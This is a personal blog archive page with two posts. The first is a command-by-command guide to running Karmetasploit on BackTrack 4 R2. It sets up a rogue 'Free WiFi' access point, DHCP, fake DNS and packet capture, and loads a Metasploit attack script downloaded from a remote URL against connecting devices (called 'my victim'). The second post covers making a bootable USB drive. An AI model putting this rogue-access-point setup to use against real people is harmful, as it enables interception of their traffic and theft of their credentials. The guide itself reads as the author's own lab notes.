Archive for January, 2011

Karmetasploit on BT4R2

Saturday, January 8th, 2011

Purpose
The purpose of this post is to provide quick guidance on getting Karmetasploit running on BT4R2 for my specific environment.  These steps may work for you, but this post is intended, primarily, to document this so I can remember it later…

Background
Karmetasploit is a combination of Karma and Metasploit.

Resources Used
1: KARMA + Metasploit Framework 3 == Karmetasploit
2: Metasploit with MYSQL in BackTrack 4 r2
3: Karmetasploit Configuration
4a: Metasploit + Karma=Karmetasploit Part 1
4b: Metasploit + Karma=Karmetasploit Part 2

Prerequisites

  • BT4R2 is installed
  • Networking to the Internet is available (to update BT and MSF)

Update BackTrack and MSF
Update BT4R2

> /usr/bin/apt-get update
> /usr/bin/apt-get upgrade

Update MSF

> /opt/metasploit3/msf3/msfupdate

Configure
Metasploit Karma Configuration File
Download File

> /usr/bin/lynx -nolist -dump http://metasploit.com/users/hdm/tools/karma.rc > karma.rc

Edit File
Change the following lines as noted
load db_sqlite3 -> db_driver mysql
db_create /root/karma.db -> db_connect root:toor@localhost/karma

DHCP Configuration File
Edit File
Change the following config file as described in Resource 1.
/etc/dhcp3/dhcpd.conf

Reboot
Restart the host to reset the wireless network… This step may be necessary if you were using the wireless interface to perform the above activities.

Test Wireless Injection

> /usr/local/sbin/airmon-ng start wlan0

The above command creates interface mon0.
The next command tests packet injection on the interface. (Note that the option is "--test" with two dashes; some browsers render it as a single dash.)

> /usr/local/sbin/aireplay-ng --test mon0

To stop the monitor interface

> /usr/local/sbin/airmon-ng stop mon0

Run
Start MySQL

> /etc/init.d/mysql start

Create Fake AP
If you have not done so already, place the wireless card in monitor mode using:

> /usr/local/sbin/airmon-ng start wlan0

Then execute the following commands:

> /usr/local/sbin/airbase-ng -P -C 30 -c 1 -e "Free WiFi" -v mon0

(The above command creates interface at0. We will use this as the end-point interface for clients connecting to our fake AP.)
Note: without the -c 1 option, my AP would NOT show up in the available networks list of my victim. I obtained the channel number by looking at the output of the --test run: I compared the APs showing up in that list to those showing up on my victim, then used the same channel. Others have experienced this, as noted in Kosis's comment on CG's blog post (Resource 4b).

> /sbin/ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
> /usr/sbin/dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
> /opt/metasploit3/msf3/msfconsole -r karma.rc
> /usr/sbin/tcpdump -w dump.pcap -i at0

Look at Progress

msf> db_notes

Consider: Blackhole Routing from the MSF paper

NOTES
It looks like fakedns crashes after some time; it appears to crash after the first client connections. How to monitor this?
The fakedns can be restarted as follows:

msf> use auxiliary/server/fakedns
msf> set SRVPORT 53
msf> run

Creating a bootable USB thumb drive

Saturday, January 8th, 2011

USB Drive

I want to get started with BackTrack 4 R2 (BT4R2) on a dedicated laptop. But I don’t think I can burn a DVD reliably, so I need another method.

Solution - Bootable USB Thumb Drive

This solution may work with other operating systems…

Steps:

  1. Download BT4R2 ISO image.
  2. Download UNetbootin and install.
  3. Use UNetbootin to create the bootable USB drive from the ISO. This may take a while.
  4. Prep the target laptop by ensuring that the "boot from USB" option is enabled. On my test box, a D620, it's F2 at boot to get into the BIOS configuration. NOTE: Be sure to clean up the boot settings once the OS is installed on the HDD.
  5. Once UNetbootin is done creating the bootable USB drive, insert the key into the target laptop and boot!
  6. Follow process to install BT4R2.

Saweet.

Bill